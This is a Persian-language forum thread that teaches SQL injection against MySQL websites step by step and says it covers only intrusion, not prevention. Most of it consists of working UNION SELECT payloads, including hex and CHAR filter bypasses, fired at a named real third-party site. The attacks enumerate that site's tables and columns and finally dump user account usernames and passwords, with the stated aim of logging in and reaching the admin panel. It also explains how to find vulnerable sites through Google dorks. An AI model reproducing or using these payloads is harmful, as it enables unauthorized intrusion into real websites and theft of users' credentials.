[Only_AmniaT]

..:: به نام او و در راه او ... ::..

در اين تاپيك به آموزش مقدماتي تا پیشرفته SQL INJECTION ميپردازم و اميد وارم از آموزش هاي اين تاپيك استفاده درستی کنید .

سعي ميكنم خيلي خيلي ساده توضيح بدم به شيوه اي كه همه ی دوستان خوب متوجه بشن حتي مبتدي ترين ها !

آموزشات رو به دو صورت متنی و تصویری (فیلم) قرار میدم و جاهای که نیاز به فیلم نباشه به تنها متن اکتفا میکنیم .

براي شروع از ديتابيس MySQL شروع ميكنم ( بايد بگم تو اين تاپيك فعلا فقط به نحوه اي نفوذ ميپردازيم نه به نحوه اي جلو گيري ولي اگه ديدم استقبال خوبي داره شايد جلو گيريشم گفتيم )

فقط چند نكته هست كه بايد براي ادامه اي تاپيك و بهبود درس رعايت بشه :

نكته : سوالاي داريد اول مطالب تاپيك رو خوب بخونيد ديديد مشكل داريد بپرسيد .

نكته : كپي برداري از مطالب اين تاپيك فقط با ذكر منبع و نام نويسنده مجاز است . . .

نكته : نظرات و انتقادات خودتونو در مورد اين تاپيك كه چيكار كنيم بهتر شه يا درسمونو به كجا ها بكشيمو يا درس يا تاپيك چه مشكلي داره رو در اين تاپيك مطرح نكنيد و ميتونيد يا با ايدي من يا با USER من در همين فروم تماس داشته باشيد و نظرات و انتقادات خودتونو به من اطلاع بدید .

نكته : براي تشكر از هر پست يا مطلبي از دکمه در زير پست ها استفاده كنيد كه براي اعضاي سايت فال است .

و نکته آخر : با نظرات و تشكراتون منو همراهي كنيد .

موفق باشيد ....

[Only_AmniaT]

ه توضيح كوتاه در مورد SQL INJECTION :

همونطور که میدونید در اغلب برنامه های تحت وب از بانک اطلاعاتی استفاده میشه که اطلاعاتی نظیر اسامی ، اطلاعات کاربردی یک سایت ، اطلاعات کاربران و مدیران و ... در آن قرار میگیره .

این برنامه ها اطلاعاتی که کاربران میخواهند وارد کنند را از طریق کد هایی که برنامه نویس نوشته دریافت میکنند و بر اساس آنها Query جدیدی تعریف میکنند و به دیتابیس یا همون بانک اطلاعاتی ارسال میکنند . و ارتباط Database با کاربر از طریق همین Query ها برقرار میشود .

اکثر این برنامه ها از زبان SQL برای این ارتباط استفاده میکنند و جالبه که بدونید این فرایند که Query ها بر اساس اطلاعاتی که کاربران برای آنها تایین میکنند و مستقیماً در فیلدهای ورودی صفته وب وارد میکنند می تواند راهی برای نفوذ یک هکر باشد .

به عبارت دیگر اگر برنامه ای که توسط برنامه نویس نوشته شده ، اطلاعات یک فیلد رو که با همان دستورات کاربر وارد شده رو جلوی یک دستور SQL بگذارد و آن را برای اجرا کردن به بانک اطلاعاتی بفرستد در اینصورت یک هکر که با زبان SQL آشنا باشد می تواند محتویات این فیلدها را طوری با دستورات SQL پر کند که ممکن است به یک فرمان مخرب تبدیل شده و پس از اجرا ، اهداف نفوذگر را برآورده نماید .

و ما در این آموزشات میخواهیم همان دستورات و نحوه دستوپنجه نرم کردن با این برنامه های نوشته شده توسط برنامه نویسان رو مرور کنیم .

باگ ها SQL از طريق برنامه نويسي غلت و اشتباه برنامه نويس سايت اون باگ بوجود مياد و هكر ها هم از اين فرصت ها استفاده ميكنن و از طريق اون خرابي كه ما بهش ميگيم باگ اطلاعات سايت رو بدست ميارن و در اخر نفوذ و ...

ميتونم بگم روي تعداد زیادی از سايت هاي كه وجود داره باگ SQL موجود است ! مثلا بيشتر سايت هاي دولتي ما یا کشور های دیگر از این نوع باگ ها برخوردارن ! مثل : سايت هاي دانشگاها , سايت هاي بانك ها , سايت هاي دولتي , و ....

نوع ديتابيسي كه ما ميخوايم اموزش بديم :

در SQL ديتابس هاي زيادي هستند كه معروف ترين اين ها ميتونيم به MySQL , MsSQL , Orcal ا و ... اشاره كرد، در اين نوع ديتابس ها حملات تقربا شبيه به هم هستند (از نظر دستوري)

ما در اين تاپيك ميخوايم به آموزش حملات MySQL بپردازيم كه براي START خيلي خوبه ! يعني با دستورات بهتر اشنا ميشين مقدماتي تر نسبت به بقيه ساده تر هستش .

در ادامه با پیدا کردن سایت های آسیب پذیر و نحوه چک کردن سایت ها و ... آشنا میشید ...

موفق باشید .

[Only_AmniaT]

خوب از مبتدي ترين قسمت شروع ميكنيم يعني پيدا كردن سايت اسيب پذير كه خيليا داخل اين كار مشكل دارن !

يچيزيو قبل از همه ميگم اصلا فكر نكينيد كه سايت مورد نظر شما بايد اين باگ رو داشته باشه Ok ؟

خوب برا پيدا كردن سايت اسيب پذير راه هاي زياديي وجود داره مثلا يكي از بهترين راه ها استفاده از گوگل است كه تمام صفحات رو سرچ ميكنه خيلي كارش درسته ( معروفه به عمو گوگل ) خوب هالا ميگيد چيو سرچ كنيد ؟

شما ميتونيد با وسيله بعضي از دستورات ادرس هاي سايت هارو سرچ كنيد نه مطالب سايت ها رو و ما هم به ادرس اهتياج داريم نه مطالب پس بايد از دستورات مخصوصي استفاده كنيم مثل :‌ [inurl : " DORK " l ا] به جاي DORK بايد Dork مورد نظرتونو بزاريد كه براي هر باگ يك dork مخصوص وجود داره منظورم اين نيست كه فقط يك نوع dork براي يك نوع حمله هست مثلا براي MySQL بايد فقط يچيزي سرچ كرد و براي بقيه هم ... نه ! :
ما در inurl: " Dork " l ا ميگيم اي گوگل بگرد دنبال فلا صفحه ميان سايت ها در كل دنيا ! ok ؟

خوب تا اينجا خدا كنه فهميده باشين خوب حالا مثلا dork ما اينه :

نقل قول:

/news.php?id=

همينو برين تو گوگل سرچ كنين خيلي از سايت هاي كه باگ MySQL ِيا SQL دارن براتون مياد !

خوب به اين شكل ميتونيد سايت هاي داراي باگ رو پيدا كنيد بعد از پيدا كردن اين نوع سايت ها بايد تست كنيد ببينيد ايا سايت مورد نظر باگ مورد نظرتونو داره يا نه ؟ خوب براي اين كار 2 روش وجود داره يكي روش علمي و يكي ديگه تستي يعني كاركتري سايت مورد نظرتونو تست كنيد بببينيد باگ داره يا نه !

خوب حالا به چه صورت ؟‌

علمي :‌

به اخر تارگتمون يه AND 1=1 اضافه كنيم و سايت كامل مياد بالا و بعد از اين 1 رو به 0 تبديل كنيم و ارور مشاهده كنيم يعني سايت باگ داره ! به اين شكل ميشه : AND 1=0 !
مثلا اين تارگت : http://navr-bg.org/news.php?id=84
اگه ما AND 1=1 اضافه كنيم سايت كامل مياد بالا ولي وقتي AND 1=0 رو بزنيم سايت كامل لود نميشه ! (‌باگ داره )
به اين شكل :

نقل قول:

http://navr-bg.org/news.php?id=84 and 1=1

كاركتري :

اخر تارگتمون يه : ( ' ) اضافه ميكنيم و اگه ارور مشاهده كرديم يا صفحه كامل لود نشود يعني باگ داره به اين صورت :

نقل قول:

http://navr-bg.org/news.php?id=84'

تا اينجا براي پيدا كردن سايت باگ دار و مشاهده كردن اين كه باگ داره سايتمون يا نه !

برای اینکه بهتر یاد بگیرین میتونید فیلم اموزشی رو هم نگاه کنید :
حجم : 3MG سازنده : Only_AmniaT برای : Tarfandestan ! اپلود شده در سایت : Tarfandestan .

دانلود فیلم <===

موفق باشيد ...

[Only_AmniaT]

بعد از پيدا كردن سايت باگ دار اولين كاري كه ميكنيم بايد ببينيم ستون هاي (CLM) اين سايت چنتاست !

براي اين كار در MySQL بايد از دستور order by استفاده كنيم كه اين دستور تعداد ستون هارو به ما ميده !

اين ميشه اولين قدم در حمله !

براي بدست اوردن ستون ها بايد به شكل زير كدمونو tazrigh كنيم :

کد PHP:

http://www.navr-bg.org/news.php?id=84+order+by+30-- 


نكته : ( -- ) به معناي اتمام دستورات هست و يعني ميگه هيمنجا پايان .
نكته : ( + ) رو هم ميتونيد بزنيم هم ميتونيم جاش اسپيس بزنيم يعني خالي ! اين دستور hex شده اسپيس هست !

كه ميتونيم عددمونو تغيير بديم تا بدست بياريم ستون ها رو (‌بايد hats بزنيد ! از 1 تا ... ) معمولا بين 1 تا 30 هست !

براي راهتي كارتون ميتونيد مثلا 15 بزنيد اگه ارور داد يعني كم تر 15 هست و اگه ارور نداد يعني يا بيشتر از 15 هست يا خود 15 هست !

حالا امتحان ميكنيم 15 رو ميزنيم ارور ميده حالا 10 ميزنيم ارور ميده 5 ميزنيم ارور ميده 1 ميزنيم ارور نميده !
پس بيشتر از 1 هستش 2 ميزنيم ارور نميده پس يا بيشتر از 2 هست يا خود 2 حالا 3 رو ميزنيم ارور نميده يا خود 3 هست يا بيشتر هالا 4 ميزنيم ارور ميده پس ميشه همون قبليش كه ارور نداد يعني 3 !!!

به اين صورت ميتونيد سوتون هاي سايت رو بدست بياريد ! ==> 3

هالا ميريم سر خود حمله ! اولين كار اينه كه ستون ها رو فراخاني كنيم با دستور union select
براي اين كار و استفاده از اين دستور بايد به اين شكل كارمونو انجام بديم :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,2,3-- 


نكته : ( - ) در قبل از 84 يعني ما با اين دستور ميتونيم اطلاعات رو از سرور بكشيم اون 84 هم ديگه بي معني هستش ميتونيد بجاي 84 هر چيزه ديگه بزنيد 1 يا 656 يا 6852 يا 99999 يا .... هرچي بخواين ...

خوب در اينجا ميتونيم از هر 3 ستون استفاده كنيم ولي در بعضي سايت ها ميون چندين ستون شايد فقط 2 يا 1 ستون از ميون اون ها قابل استفاده باشه !

حالا ميرسيم به قسمت محم حمله پيدا كردن ورژن سايت مورد نظر كه 2 حالت داره 1 : ورژن بالاي 5 باشه 2 : ورژن پاين پنج باشه !

اگر ورژن بالاي پنج باشه ميتونيم از information اطلاعاتمونو بكشيم بيرون ! ( راحت )
اگر ورژن پايين پنج باشه بايد تيبل و كولومن ها رو hats بزنيم! ( كه كار يكم مشكل ميشه ! )

براي پيدا كردن ورژن ديتابيس سايت ميتونيم از دستو [ Version() l يا Version@@ ] استفاده كنيم !
براي اين كار كلمه version@@ رو در يكي از ستون هاي كه باز هست و ما ميتونيم ازش استفاده كنيم قرار ميديم تا اطلاعات رو به ما نشون بده ! به اين صورت :

کد PHP:

http://www.navr-bg.org/news.php?id=-99+union+select+1,@@version,3-- 


همين تور كه ميبينيد ورژن بالاي 5 هست و كار ما خيلي راحت تر ميشه ! زيرا در ورژن 5 به بالا information وجود داره در سايت و ميتونيم راهت اطلاعات رو بكشيم بيرون !


سعي كردم خيلي ساده و خيلي كامل توضيح بدم اگه سوالي تا اينجا داشتيد بگيد جواب ميدم !
ممنون از Hamrahitoon ...

برای اینکه بهتر یاد بگیرین میتونید فیلم اموزشی رو هم نگاه کنید :
حجم : 1,91 MB سازنده : Only_AmniaT برای : Tarfandestan ! اپلود شده در سایت : Tarfandestan .

دانلود فیلم اموزشی <===

موفق باشيد ...

[TEIMOOR]

سلام دوست عزيز اكر سايت php نبود جي مثلا اين سايت

http://www.alghanimcareers.com/caree...anim/home.aspx

اونوقت جيكار بايد كرد

[Only_AmniaT]

نقل قول:

سلام دوست عزيز اكر سايت php نبود جي مثلا اين سايت

http://www.alghanimcareers.com/caree...anim/home.aspx

اونوقت جيكار بايد كرد

دوست عزيز اگه اولين پست رو ميخوندي ميديد كه گفتم فقط به MySQL ميپردازيم !

درست MySQL براي PHP هست خوب كمكم بايد پيش رفت نه يدفعه بريم پله 1000 ....

MySQL = PHP
MsSQL = ASP
Acces = ASP , ASPX
and ....

ما در اين تاپيك ميخوايم هم با دستورات SQL و يك نوع حمله اشنا شيم !

براي سوال شما هم :

اگه دقت كني من چك كردم به اين نتيجه رسيدم :

نقل قول:

http://www.alghanimcareers.com/caree...spx?PageId=604'

اروري مشاهده نميكنيد بايد bilind كنيد تا به نتيجه برسيد ! كه اگه وقت بشه بعد از چند نوع راه ديگه و بعد ها به اين نوع حمله هم ميرسيم ! ..

[Only_AmniaT]

خوب اگه سوالي نبود ميريم سر اموزش بعدي ! : P4

بعد از بدست اوردن ورژن سايتمون ميريم براي بدست اوردن table هاي سايت كه به وسيله اي همين TABLE ها ميتونيم از COLUMN ها استفاده كنيم ! yezare الا براتون گنگه ولي يكم پيش بريم بهتر ميفهمينش !

خوب براي بدست اوردن TABLE هاي سايت بايد اطلاعات رو از information_schema بيرون بكشيم ( براي ورژن بالاي 5 ) خوب براي اين كار به اين صورت كارمونو انجام ميديم :

بعد از :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,2,3-- 


بعد از ستون هامون يه فروم وارد ميكنيم
نكته : كلمه ( from ) براي دستور يا انجام دادن يا اجراي چيزي هست !
و بعد از فروم information_schema رو ميزاريم كه ما ميخوايم اطلاعات رو ازش بكشيم بيرون !
بعد از information_schema يه ( . ) ا ezafe ميكنيم و بعد از ( . ) اطلاعاتي كه ميخوايم مثلا ما ميخوايم تيبل هارو بگشيم بيرون ميزنيم tables يا اگه كولمن ها رو ميخوايم ميزنيم : columns كه مي با اين دستور مثلا ميگيم تيبل هاي سايت رو از information_schema بكش بيرون بده به ما ok ؟

خوب ما حالا تيبل هارو ميخوايم ميزنيم : tables ! به اين شكل :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,2,3+from+infromation_schema.tables-- 


الان ما با اين دستور سايت رو اماده كرديم كه به ما تيبل هارو بده فقط كاافيه درخواست كنيم مثل وقتي ميخواستيم ورژن رو در بياريم ! به اين شكل :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,table_name,3+from+information_schema.tables-- 


با اين كار ما تيبل اوب سايت رو بدست اورديم ولي همين كافي نيست شايد اون تيبلي كه داخلش پسود و يزر نامي هست اين نباشه ! براي بدست اوردن بقيه تيبل ها چند راه وجود داره كه ما چنتا شو ميگيم :

1. استفاده از دستور group_concat () l
2. استفاده از دستور limit و دستور offset
3. استفاده از دستور : like

1 : خوب rahat tarin rah استفاده از group_concat () l است كه تمام اطلاعات رو ميده ( در اينحا ما تيبل ها رو ميخوايم ) براي استفاده از اين دستور به اين صورت كار ميكنيم :

کد PHP:

 http://www.navr-bg.org/news.php?id=-84+union+select+1,group_concat(table_name),3+from+information_schema.tables-- 


كه ميبينيد كه تمام تيبل ها رو ميتونيد نگاه كنيد !

‌2 : rahe بعدي كه ميتونيد تمام اطلاعات رو بكشيم بيرون ( اينجا تيبل ميخوايم اگه كولومن ميخواستيم هم همينتور و ... ) ميتونيم از دستور limit و offset استفاده كنيم به اين صورت :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,table_name,3+from+information_schema.tables+limit+1+offset+0-- 


نكته : بايد از 0 شروع كنيم 0 يعني اولينش !

خوب شما بايد 0 رو تغيير بديد همينتور كه بالا ميريد يعني 1 بعد 2 بعد 3 بعد ... كم كم تمام تيبل هارو پيدا ميكنيم اين كارو براي كولومن ها هم ميتونيم انجام بديم !
تا اخرش كه يا به ارور ميخورين يا خالي نشون ميده كه اينجا خالي نشون ميده! در اينجا اخرش اينه :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,table_name,3+from+information_schema.tables+limit+1+offset+19-- 


ولي تيبل ما در 18 هست به اسم : members كه معمولا يه mmbers هست يا user يا users يا admin يا user_admin يا adminstrator يا useradmin يا .... معمولا اين چيزا هست ولي بايد چيزاي كه به اين كلمه ها نزديك هست رو امتحان كنيد ! البته بعضي vaghta هست كه مدير سايت زرنگي ميكنه و اين تيبل هارو تغيير ميده منظورم اسمشه ! براي امنيت بيشتر سايتش ! ولي بازم راه داره كه بعدا بهش ميپردازيم ...

3 : استفاده از دستور like هست كه خيلي خيلي كارمونو اسون ميكنه !
مثلا ما ميخوايم دنبال تيبل ادمين بگرديم ولي نه دستور limit نه دستور group_concat جواب نداد ! بايد چيكار كنيم ؟
ميتونيم از دستور like استفاده كنيم كه تو 90% سايت ها جواب دقيق ميگيريم ! خوب چطوري ؟
به صورت زير :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_name+like+'%user%'-- 


يه زره پيچيده ميشه ولي تيك تيكش ميكنم تا راهت تر ياد بگيرين !

1 : همين تور كه ميبينيد ما تو ستون 2 group_concat رو هم گذاشتيم به اين دليل كه ميخوايم توي تمام تيبل ها بگرديم دنبال ...
2 : بعد از information_schema.tables يه where اظافه كرديم ! يعني تو اين دستور ميگيم كودوم دستور كجا وجود داره شبيه اين دستور يا معني هاي ديگه ....
3 : بعد از where زديم table_name يعني اين ميشه ادامه اي معني جمله اي قبلي كودم تيبل هست هم معنيه :...
4 : بعد دستور like !
5 : و بعد از همه يه ( ' ) و يه ( % ) و بعد دستوري كه ميخوايم دنبالش بگرديم مثلا user مثلا admin مثلا pass يا ...كه براي تيبل ها معمولا user يا admin يا member يا ... سرچ ميشه و براي كلومن ها : pass يا user يا acount يا ... و بعد ( % ) و بعدشم ( ' ) و در اخرم براي به پايان رسوندن ( -- ) خوب حالا يه سوال ! ميگيم (%) براي چيه ؟ دستور % يعني ميگه كلمات قبل و بعدشو برامون سرچ كن يعني اگه user یو ميخوايم سرچ كنيم بگرده ببينه چيزي شبش هست اشكالي نداره چيزي اخرش ازافه شه يا به اولش فقط بگرد ببين چيزي شبيهش هست يا نه ! مثلا اگه acoun_user هم بود يا user_admin يا .. اشكالي نداره بهم نشون بده ! (توضيح خيلي ساده)

خوب حالا بعضي vaghta ما وقتي كلمه اي رو ميزنيم براي سرچ ارور ميده مثل همين سايتي كه ما داريم !
بايد چيكار كنيم ؟ بيخيال شيم ؟ نه ما اينو هم دور ميزنيم چطوري ؟
چند راه داره كه ما به 2 تاش ميپردازيم !: :

1. Hex كردن
2. Char كنيم كلمه رو !
3. و ....

1 : Hex كردن : ما كلمه مورد نظرمونو به كد تغير ميديم تا شناساي يا block نشه ! چطوري ؟
ميتونيد از سايت ها يا برنامه هاي مختلفي استفاده كنيد ميتونيد تو گوگل سرچ كنيد پيدا كنيد اگه نكرديد بگيد براتون ميزارم !
2 : روش دوم و رايج استفاده از Char است يعني ما دستورمونو مثلا %user% رو تبديل به كد هاي Char ميكنيم خوب در اينجا %user% ميشه : CHAR(37, 117, 115, 101, 114, 37) l كه به اين شكل وارد ميكنيم :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_name+like+CHAR(37, 117, 115, 101, 114, 37)-- 


خوب شما ميگيد ما چطور Char كنيم ؟ باز هم ميتونيد از نرم افزار هاي مختلف استفاده كنيد كه اگه از mozila استفاده ميكنيد حتما afzoneye هك بار رو نسب كنيد كه خيلي كار برد داره داخل SQL بين هكر ها معروفه !

به اين شكل ميتونيد تيبل هاي يك سايت رو بدست بياردي من تو اين قسمت خيلي ساده و كامل توضيح دادم شايد بايد 10 - 15 فيلم ميديد تا اينا رو يه جا ياد ميگرفتين خيلي ساده توضيح دادم ببخشيد اگه غلت املاي داشت ham خيلي tond tond مينوشتم هم mokham داره اتيش ميگيره !!!!!
شوخي ميكنم mokhlese همتون

بازم اگه مشكلي داشتيد بگيد ! به سوالاتتون جواب ميدم تا اينجا به پيدا كردن تيبل پرداختيم و بعدش كولومن هاست و بدست اوردن user و pass مدير كه ديگه اينقدر توضيح نداره خيلي سادست ! اگه سوالي داريد هيمنجا بگيد كه رد نشيم !....

موفق باشين ....

[Only_AmniaT]

خوب دوستان تا اينجا پيش رفتيم كه : table هارو چطور بيرون بكشيم ! و ريزه كاري ها و روشاهاي متداول اين كار !

خوب ميرسيم به Column ها براي بدست اوردن column ها روش كار مثل روش كار بدست اوردن Table هاست اگه پست قبليو خوب فهميده باشين اينو هم ميفهمين !

خوب ما در پست قبل خونديم كه ميتونيم به چندين روش تيبل ها رو بيرون بكشيم حالا در اين پست همون كار هارو تكرار ميكنيم ولي با اين فرق كه جاي اسم "Table ها رو به column تغيير ميديم ! خيلي سادست !

حال چند روش ديگه رو با هم كار ميكنيم و روش هاي قبليم رو كامل ميكنيم ! اگه براتون گنگ بود بگيد !

خوب اولين كاري كه ميكنيم ستون ها رو اماده كار ميكنيم (‌كه لازم نيست فقط ميخوام قدم به قدم برم جولو )

کد PHP:

http://www.navr-bg.org/news.php?id=-99 union select 1,2,3-- 


بعد از اماده سازي اطلاعات رو از information_schema ميكشيم بيرون ( information فقط براي ورژن بالاي 5 وجود داره ) حالا ما اولين كولومن رو ميكشيم بيرون با استفاده از دستور :

کد PHP:

http://www.navr-bg.org/news.php?id=-99 union select 1,column_name,3+from+information_schema.columns-- 


نكته : كلماتي كه توي ستون ها ميزاريمو ميگن Column !

همينتور كه ميبينيم توي يكي از ستون ها ما column_name رو گذاشتيم يعني كولومن نامي هارو از information درخاست ميكنيد و در جواب : CHARACTER_SET_NAME به شما ميده !
ولي اين اولين كولومن هست و چيزي كه ما ميخوايم نيست ! ( ما به دنبال كولومن user و pass ادمين هسيتم )

نكته : كولومن ها به ما اطلاعات رو ميدن نه خودشون اطلاعات هستن مثلا اگه كولومن user داريم اين نيست كه ما بريم در صفحه لوگين و جاي نام كاربري بزنيم user و لوگين بشيم با كولومن user ميتونيم نام كاربري رو بكشيم بيرون !

خوب تا اينجا ما كولومن اولي رو بدست اورديم ولي اين مورد نظر ما نيست ما دنبال يچيزي مثل : user , username , pass , password , user_acount , acount_pass , pas_admin , admin_user يا يچيزي شبيه به اينا هستيم ! براي بدست اوردن بقيه كولومن ها ميتونيم از راه هاي زير استفاده كنيم :

1. استفاده از group_concat (column_name) :l
2. استفاده از limit و offset
3. استفاده از like
4. و راه بدي كه خيلي كاربردي و مناسب هستش كشيدن كولومن ها از تيبل هست !

خوب ما 1 - 2 و 3 رو در پست قبلي توضيح داديم حالا ميخوام بهتون ياد بدم چطوري مثلا وقتي تيبل مورد نظر رو بدست اوردين چطوري ببينيد كولومن هاي اين تيبل چيه ( اخه همه كولومن ها براي همه تيبل ها نميخوره ! )
حالا چطوري ؟ :
ميتونيد به وسيله دستور where و اين كارو كنين !
دستور كليش اينه :

کد PHP:

http://www.navr-bg.org/news.php?id=-999+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=كد چار-- 


نكته : در قسمتي كه نوشتم ( كد چار ) بايد اسم تيبل رو بنويسيد كه ميخواين از توش كولومن هارو بكشين بيرون !
نكته : قبل از select كلمه all رو گذاشتم كه اگه نگذاشتيدم مشكلي نداره ولي داخل بعضي از سايت ها هتما بايد بزاريد ! و براي اتمينان بزاريد !
نكته :‌ and+1=0 رو كه قبل از union گذاشتم يعني ميخوايم از ارور بكشيم بيرون , يه نوع باي پس هستش ! تو بعضي سايت ها اهتياجي نيست !

خوب بعضي از بچه هنور با CHAR اشنا نيستند ! :
يه توري توضيح ميدم كه بفهمين تقربا چيكار ميكنيم : ( رو همين سايت توضيح ميدم )
ما ميگيم magic qoute حالا ميگيد اين چيه ؟
اگه بخوام يه توضيح ساده بدم كه شما هم بفهمين ميشه گفت مسه يه فايروال يه انتي ويروس كار ميكنه ميفهمه دارين يه كاراي ميكنيد نميزاره اجازه نميده ادامه بدين ولي ما اينو ميزنيم كنار و به كارمون ادامه ميديم كه به قول baypass ميكنيم ! خوب اين baypass چطوريه ؟
اين باي پس به روش هاي مختلفي انجام ميشه كه ما به 2 نمونه از اين 2 راه ميپردازيم ! :

1. HEX
2. CHAR

1 : HEX : ما متن خودمونو تبديل به يه كد ميكنيم كه راهت ميتونيم magic qoute رو baypass كنيم !
سايت هاي زيادي هستند كه اين كارو ميكنند و نرم افزار هاي هم هستند كه من يكي از ساده ترين هاشونو براتون همين جا اپلود كردم كه ميتونيد دانلود كنيد و استفاده كنيد : نوشته شده به دست : narsic

دانلود | Download !

ما تيبلمونو كه ميخوايم از توش كولومن هارو در بياريم داخل قسمت text مينويسيم و دكمه Convert رو ميزنيم و دار قسمت Converted كد HEX شدمونو بهمون ميده ! و ما هم ميريم كدمونو ميزاريم تو همون قسمتي كه گفتم :

کد PHP:

http://www.navr-bg.org/news.php?id=-999+and+1=0+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x6163636F756E7473-- 


همينتور كه ميبينيد كولومن هاي user و pass رو به ما ميده !

روش دوم :

2 : CHAR : خوب چار كردنم دوباره همون بحث رو داره يعني magic qoute رو baypass ميكنه ( دور ميزنه )
خوب براي استفاده از اين امكان ! CHAR ! ميتونيد از برنامه ها و سايت هاي زيادي استفاده كنين در اين راه ولي من به شما همون تور كه قبلا گفتم HACK BAR رو توصيح ميكنم كه خيلي خوبه و كار بردي ! : براي MOZILA هستش !



دانلود | Download ! ==> وقتي رو اين لينك تو موزيلا ( فاير فاكس ) كليك كنيد يه صفحه باز ميشه اينستال رو بزنيد خودش نسب ميشه ! ...

ميتونيد اين برنامه ( افزونه ) رو از خود سايت Mozila دانلود كنيد
اين برنامه قسمت ها و امكانات زيادي براي SQL داره حالا ما با CHAR كار داريم ميتونيد از قسيمت MySQL == MySQL CHAR() رو انتخاب كنيد و يه صفحه كوچيك باز ميشه كه ميتونيد اونجا تيبلتونو بزنيد و كد CHAR شده رو در قسمت سفيد رنگ نشون ميده ! ( اينجا تيبل ما acccounts هست ! )
كه به اين شكل ميشه :

کد PHP:

http://www.navr-bg.org/news.php?id=-999+and+1=0+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=CHAR(97, 99, 99, 111, 117, 110, 116, 115)-- 


ميبينيد كه كولومن user و pass رو به ما ميده !

خوب اينم از كولومن ها و چند روش جديد ديگه ....
خوب تا اينجا هم تيبل هم كولومن سايت رو داريد ! حالا چيكار كنيم ؟ اينو تو پست بعدي ميگم اخه خيلي خستمه ! ما بريم bekhabim بعدا بهتون ميگم چطور حمله اخر يعني بدست اوردن username و password و ورود به سايت رو بهتون ميگم !!!!! منو HAMRAHI كنين با سپاس هاتون ....

شاد باشين ....

[Only_AmniaT]

نقل قول:

نوشته اصلی توسط hadi-star

دوست عزیز این موارد به درد وبلاگ ها هم می خوره یا نه البته در عنوان هک سایت نوشته شده

در بعضي سرويس دهنده ها ديدم كه اين باگ رو دارن ولي نه روي وبلاگ ها كار نميكنه اين كار بيشتر براي سايت هاست ! ولي گفتما رو بعضي سرويس دهنده ها ديدم ! نه Blogfa يا mihanblog يا .... اينا از امنيت خوبي برخوردارن .....

[Only_AmniaT]

خوب تا اينجا اومديم كه Table و Column ادمين يا يه قسمت سايت رو كه ميخوايم بهش نفوذ كنيم ( مثلا قسمت كاربران سايت ) بدست اورديم !
در اين پست استفاده از table و Column رو ميخوايم ياد بگيريم ! به اين صورت كه :‌
اول ستون هارو اماده ميكنيم :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,2,3-- 


بعد from رو به ستون ها ezafe ميكنيم ! و بعد از اون تيبلي كه ميخوايم ازش اطلاعات رو بكشيم بيرون رو ميزنيم به اين صورت :
نكته : هر تيبل mokhtase كاره خودشه ! مثلا ما داريم رو تيبل accounts كار ميكنيم كه اين تيبل واسه قسمت كاربران هستش ! )

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,2,3+from+accounts-- 


حالا تيبل ما و سايت اماده هست كه اطلاعات رو به ما بده ! حالا ما داخل يكي از ستون هاي كه آزاده بايد كولومن هاي مورد نظرمونو بزنيم !
نكته : هر كولومن mokhtase تيبل خودشه !
به اين صورت :
خوب اول user يا همون نام كاربري رو بيرون ميكشيم :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,username,3+from+accounts-- 


چيزي كه ميده : valya
و بعدش هم pass يا همون پسورد :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,password,3+from+accounts-- 


چيزي كه ميده : outdoor
خوب اينجا فقط نام كاربري و پسورد اولين كاربر رو داريم و ميتونيم وارد بشيم ( داخل اين سايت از گوشه سمت چپ قسمت ورود داره )
براي بدست اوردن بقيه نام كار بري ها ميتونيم همونتور كه تو درس هاي قبلي گفتي از group_concat() l يا ... استفاده كنيد كه قبلا بهش پرداختيم ... به اين شكل ميشه :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,group_concat(username,0x3a,password),3+from+accounts-- 


همينتور كه ميبينيد 2 كاربر بيشتر نداره و ميتونيد وارد بشيد ! ....
نكته : 0x3a داخل HEX يعني ( : ) ! براي جدا كردن به كار ميره ....

هك به معني اين نيست كه وارد پنل ادمين شي و صفحه index رو تغيير بديم تو درس هاي ما به معني نفوذ به سايت هست كه ما اين كارو كرديم به همين روش ميتونيم تيبل و كولومن هاي ادمين هم در بياريم و وارد پنل ادمين يعني مدير سايت بشيم و همه كار كنيم .. من فقط ميخوام به شما كمك كنيم كه داخل SQL پيشرفت كنيد !

خوب خدا كنه تا اينجا رو خوب ياد گرفته باشين اگه هم نه سوالاتتونو همينجا بپرسيد حتي كوچك ترين سوال هارو بپرسيد !

موفق و پيروز باشيد ...